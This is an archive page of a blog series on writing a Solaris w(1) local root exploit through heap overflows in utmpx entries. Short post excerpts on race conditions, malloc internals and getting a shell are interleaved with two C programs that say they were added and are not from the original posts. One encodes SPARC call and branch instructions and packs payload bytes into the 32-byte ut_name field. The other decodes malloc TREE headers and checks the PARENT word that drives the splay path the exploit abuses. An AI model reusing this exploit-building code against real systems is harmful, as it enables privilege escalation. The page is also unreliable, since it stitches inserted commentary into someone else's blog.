
Bazz's Code Developments

Author: michaelbazzinott001

NX-stack bypass w(1) Local Root Exploit Realization <3 - Pt. 19

By michaelbazzinott001 Posted on November 7, 2014 Posted in Asm, buffer overflow, C, NameFS, Sparc/Solaris

Woo-Hoo. I’m finally ready to release source code :D

Heap-Based Execution from UTMPX entries – Pt. 17

By michaelbazzinott001 Posted on November 6, 2014 Posted in Asm, GDB, Sparc/Solaris

there’s only enough room in the name[32] field for 28-4 = 24 bytes of ‘authentic’ asm instructions, followed by the 8 necessary for the call / branch instruction. What’s the difference between a call and a branch instruction.. Is it …
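The 24 + 8 byte split above, worked through as an added example (my code, not the post's or the author's exploit): a small SPARC V8 encoder for the two transfer instructions the post contrasts, and a packer that lays a 32-byte ut_name-sized field out as payload, transfer, delay slot. The difference the post asks about is that `call` carries a 30-bit word displacement and writes its own address into %o7 (the call/pop trick for locating position-independent code), while `ba` carries a 22-bit displacement and links nothing; both are followed by a delay-slot instruction that runs before control leaves. The field address, target and payload words are constructed sample values; big-endian byte order and the "transfer in the last 8 bytes" layout are assumptions, not facts from the post.

```c
/* Added example, not from the original post.  SPARC V8 encodings for the two
 * control-transfer instructions compared above, and a packer that builds a
 * 32-byte ut_name-sized field as <payload><call-or-ba><delay slot>.
 * Assumptions: 4-byte aligned field, big-endian (SPARC) byte order, and that
 * the transfer plus its delay slot occupy the last 8 bytes of the field. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN    32            /* sizeof ut_name in struct utmpx */
#define XFER_LEN    8             /* call/ba (4) + delay-slot instruction (4) */
#define PAYLOAD_LEN (NAME_LEN - XFER_LEN)   /* 24 bytes of 'authentic' code */
#define SPARC_NOP   0x01000000u   /* sethi 0, %g0 */

/* call disp30: op=01 in bits 31:30, 30-bit word displacement in 29:0.
 * Unlike a branch it saves its own address in %o7, which is why the
 * call/pop idiom is used to find shellcode's position. */
static int sparc_call(uint32_t from, uint32_t to, uint32_t *out)
{
    int32_t delta = (int32_t)(to - from);
    if (delta & 3)
        return -1;                          /* targets must be word aligned */
    int32_t words = delta / 4;
    if (words < -(1 << 29) || words > (1 << 29) - 1)
        return -1;                          /* out of disp30 range */
    *out = 0x40000000u | ((uint32_t)words & 0x3fffffffu);
    return 0;
}

/* ba disp22: op=00, annul bit 29, cond=1000 (always) in 28:25,
 * op2=010 in 24:22, 22-bit word displacement in 21:0.  No link register. */
static int sparc_ba(uint32_t from, uint32_t to, int annul, uint32_t *out)
{
    int32_t delta = (int32_t)(to - from);
    if (delta & 3)
        return -1;
    int32_t words = delta / 4;
    if (words < -(1 << 21) || words > (1 << 21) - 1)
        return -1;                          /* out of disp22 range */
    *out = (annul ? 0x30800000u : 0x10800000u) | ((uint32_t)words & 0x3fffffu);
    return 0;
}

static void put_be32(uint8_t *p, uint32_t w)
{
    p[0] = (uint8_t)(w >> 24); p[1] = (uint8_t)(w >> 16);
    p[2] = (uint8_t)(w >> 8);  p[3] = (uint8_t)w;
}

static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Lay out the field: payload words (nop-padded to 24 bytes), then the
 * transfer at field_addr+24 and a nop in its delay slot, which executes
 * before control leaves.  field_addr is where the field will sit in memory. */
static int pack_name_field(const uint32_t *payload, size_t n_words,
                           uint32_t field_addr, uint32_t target,
                           int use_call, uint8_t out[NAME_LEN])
{
    if (n_words > PAYLOAD_LEN / 4 || (field_addr & 3))
        return -1;
    for (size_t i = 0; i < PAYLOAD_LEN / 4; i++)
        put_be32(out + 4 * i, i < n_words ? payload[i] : SPARC_NOP);
    uint32_t xfer_addr = field_addr + PAYLOAD_LEN;
    uint32_t insn;
    int rc = use_call ? sparc_call(xfer_addr, target, &insn)
                      : sparc_ba(xfer_addr, target, 0, &insn);
    if (rc)
        return -1;
    put_be32(out + PAYLOAD_LEN, insn);
    put_be32(out + PAYLOAD_LEN + 4, SPARC_NOP);
    return 0;
}

/* Zero bytes only matter if the field ever passes through a C-string copy;
 * note that the SPARC nop itself contains three of them. */
static int count_nul_bytes(const uint8_t *buf, size_t n)
{
    int c = 0;
    for (size_t i = 0; i < n; i++)
        c += (buf[i] == 0);
    return c;
}

int main(void)
{
    /* constructed sample: two payload words, field at 0x100, target 0x200 */
    const uint32_t payload[] = { 0x90102000u /* mov 0,%o0 */, 0x92102001u /* mov 1,%o1 */ };
    uint8_t field[NAME_LEN];
    if (pack_name_field(payload, 2, 0x100, 0x200, 1, field) != 0)
        return 1;
    for (int i = 0; i < NAME_LEN; i += 4)
        printf("%02x: %08x\n", i, get_be32(field + i));
    printf("nul bytes: %d\n", count_nul_bytes(field, NAME_LEN));
    return 0;
}
```

With the sample values the transfer word at offset 24 is a `call` from 0x118 to 0x200, i.e. a displacement of 58 words. Swap `use_call` to 0 to get the `ba` form and the encoder will refuse any target outside the 22-bit range, which is the practical reason to prefer `call` when the landing address is far from the field.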

Race Condition SHMACE ShmUh’SMISION – pt. 16

By michaelbazzinott001 Posted on November 5, 2014 Posted in Uncategorized

WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ??? I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that: So I …

Race Condition Determination – Pt. 15

By michaelbazzinott001 Posted on November 4, 2014 Posted in Uncategorized

It appears to be a blind race!?!? :[ But it is NOT so. There is a way to determine where my cool cat program IS in the race!! By adding the overflow entry as a USER_PROCESS entry, it can be …

Possible Circumvention — Pt. 14

By michaelbazzinott001 Posted on November 3, 2014 Posted in Uncategorized

In t_delete /* make op the root of the tree */ if (PARENT(op)) t_splay(op); make the parent point to another entry earlier in the heap… this is an entry/shellcode starter.. entry/shellcode (pp) starter format: SIZE(PP) is the first 8 bytes …

Analysis Utilities — Pt. 13

By michaelbazzinott001 Posted on November 2, 2014 Posted in Uncategorized

Yes, the TREE structure in the TREE UTMPX entry must start on a WORD-aligned boundary (8-byte aligned on 32-bit, 16-byte aligned on 64-bit). To understand the 32/64 TREE structure in raw form: Demonstrated difference between ALIGN on 32-bit vs. 64-bit …
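A decoder for the raw 32/64-bit TREE form discussed in Pt. 13, which also exposes the SIZE(PP) and PARENT words that the t_delete / t_splay trick in Pt. 14 depends on, added here as an example (my code, not the author's). The header layout it assumes is the OpenSolaris libc malloc.c TREE as I recall it: six WORD slots (t_s, t_p, t_l, t_r, t_n, t_d), each WORD sized by ALIGN, so 8 bytes on 32-bit SPARC and 16 on 64-bit, with the size_t or pointer in the leading bytes (big-endian) and the low two bits of the size word used as flags (BIT0 block busy, BIT1 previous block busy). Verify the slot order and flag meanings against your libc before relying on them. Both byte dumps are constructed.

```c
/* Added example, not from the original posts: decode a raw Solaris libc
 * malloc TREE header as found in a heap dump, for 32- and 64-bit SPARC.
 * Assumed layout (OpenSolaris malloc.c as I recall it; check your libc):
 *   WORD t_s, t_p, t_l, t_r, t_n, t_d;   six slots, each sizeof(WORD)
 *   WORD = union { size_t w_i; TREE *w_p; ALIGN w_a; }
 *   ALIGN = double (32-bit) / long double (64-bit)  ->  WORDSIZE 8 / 16
 *   SIZE(b)   = t_s.w_i with BIT0 (block busy) and BIT1 (previous block busy)
 *   PARENT(b) = t_p.w_p, LEFT/RIGHT = t_l/t_r, LINKFOR = t_n
 *   DATA(b)   = b + WORDSIZE,  NEXT(b) = b + SIZE(b) + WORDSIZE */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define BIT0   0x1u
#define BIT1   0x2u
#define BITS01 0x3u

typedef struct {
    int      bits;        /* 32 or 64 */
    unsigned wordsize;    /* 8 or 16 */
    uint64_t size;        /* SIZE(b) with the flag bits stripped */
    int      busy;        /* BIT0 */
    int      prev_busy;   /* BIT1 */
    uint64_t parent, left, right, link;
} tree_hdr;

static unsigned word_size(int bits) { return bits == 64 ? 16u : 8u; }

static uint64_t load_be(const uint8_t *p, unsigned n)
{
    uint64_t v = 0;
    for (unsigned i = 0; i < n; i++)
        v = (v << 8) | p[i];
    return v;
}

/* Returns 0 on success, -1 if bits is unsupported or the dump is too short. */
static int decode_tree(const uint8_t *raw, size_t len, int bits, tree_hdr *h)
{
    if (bits != 32 && bits != 64)
        return -1;
    unsigned ws = word_size(bits), ptr = (unsigned)bits / 8;
    if (len < 6 * ws)
        return -1;
    uint64_t ts = load_be(raw + 0 * ws, ptr);
    h->bits = bits;
    h->wordsize = ws;
    h->size = ts & ~(uint64_t)BITS01;
    h->busy = (ts & BIT0) != 0;
    h->prev_busy = (ts & BIT1) != 0;
    h->parent = load_be(raw + 1 * ws, ptr);
    h->left   = load_be(raw + 2 * ws, ptr);
    h->right  = load_be(raw + 3 * ws, ptr);
    h->link   = load_be(raw + 4 * ws, ptr);
    return 0;
}

/* A fake TREE must sit on a WORDSIZE boundary: 8 on 32-bit, 16 on 64-bit. */
static int tree_aligned(uint64_t addr, int bits)
{
    return addr % word_size(bits) == 0;
}

static uint64_t tree_data(uint64_t block, int bits) { return block + word_size(bits); }
static uint64_t tree_next(uint64_t block, const tree_hdr *h)
{
    return block + h->size + h->wordsize;
}

/* t_delete begins with  if (PARENT(op)) t_splay(op);  so a non-zero parent
 * word is what sends the free path into the splay walk. */
static int will_splay(const tree_hdr *h) { return h->parent != 0; }

/* Constructed 32-bit header: size 0x40 with BIT0 set, parent 0x12340. */
static const uint8_t sample32[48] = {
    0x00,0x00,0x00,0x41, 0,0,0,0,      /* t_s */
    0x00,0x01,0x23,0x40, 0,0,0,0,      /* t_p; t_l, t_r, t_n, t_d stay zero */
};

/* Constructed 64-bit header: same fields, 16-byte slots, 8-byte values. */
static const uint8_t sample64[96] = {
    [7] = 0x81,                                          /* t_s: 0x80 | BIT0 */
    [16 + 5] = 0x01, [16 + 6] = 0x23, [16 + 7] = 0x40,   /* t_p */
};

static void dump(const char *tag, const tree_hdr *h)
{
    printf("%s: size=0x%llx busy=%d prev_busy=%d parent=0x%llx splay=%d\n",
           tag, (unsigned long long)h->size, h->busy, h->prev_busy,
           (unsigned long long)h->parent, will_splay(h));
}

int main(void)
{
    tree_hdr h;
    if (decode_tree(sample32, sizeof sample32, 32, &h) == 0) dump("32-bit", &h);
    if (decode_tree(sample64, sizeof sample64, 64, &h) == 0) dump("64-bit", &h);
    /* reading the 64-bit dump with the 32-bit layout gives garbage: size 0 */
    if (decode_tree(sample64, sizeof sample64, 32, &h) == 0) dump("64 as 32", &h);
    return 0;
}
```

The third decode in `main` is the Pt. 13 point in miniature: the same bytes read with the wrong WORDSIZE yield a zero size and a zero parent, so a fake entry laid out for one word size silently does nothing (or worse) under the other.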

3 Things today — Pt. 12

By michaelbazzinott001 Posted on November 2, 2014 Posted in Uncategorized

1 thing: Compiling 64-bit GDB 2 : Analyzing how the heap could be brute-forced in this exploit. 3: Discovering that the address returned by malloc is consistent across runs, on different machines!! With different UTMPX file sizes!! AWESOME!! The stack …

Being Awesome Pt. 11

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized

No this is really a comparison of Stack space between Solaris 10 and Solaris 8.. at least the machines in question.. Solaris 10 box: without one-million argV[1]: 0xffbfe000 0xffbfffff 0x2000 0 -s--rwx with it: 0xffb0a000 0xffbfffff 0xf6000 0 -s--rwx Solaris …

Raw dissection of malloc – Pt. 10

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized

Sorry this section and possibly others are not ordered properly.. It is raw research slate. Here is why ut_line parsing is important.. The test has lots of requirements to satisfy.. must be in /dev/ directory.. we have to be able …

Hacking a temporary “W(1)” — pt. 9

By michaelbazzinott001 Posted on November 1, 2014 Posted in Uncategorized

In order to do this exploit properly, 2 UTMPX entries will need to be used. 1 is the “last” one in the table and it must be pre-destined before takeoff. In other words, must be setup before calling “W.” It …

Copyright © 2025 Bazz's Code Developments | Powered by Responsive Theme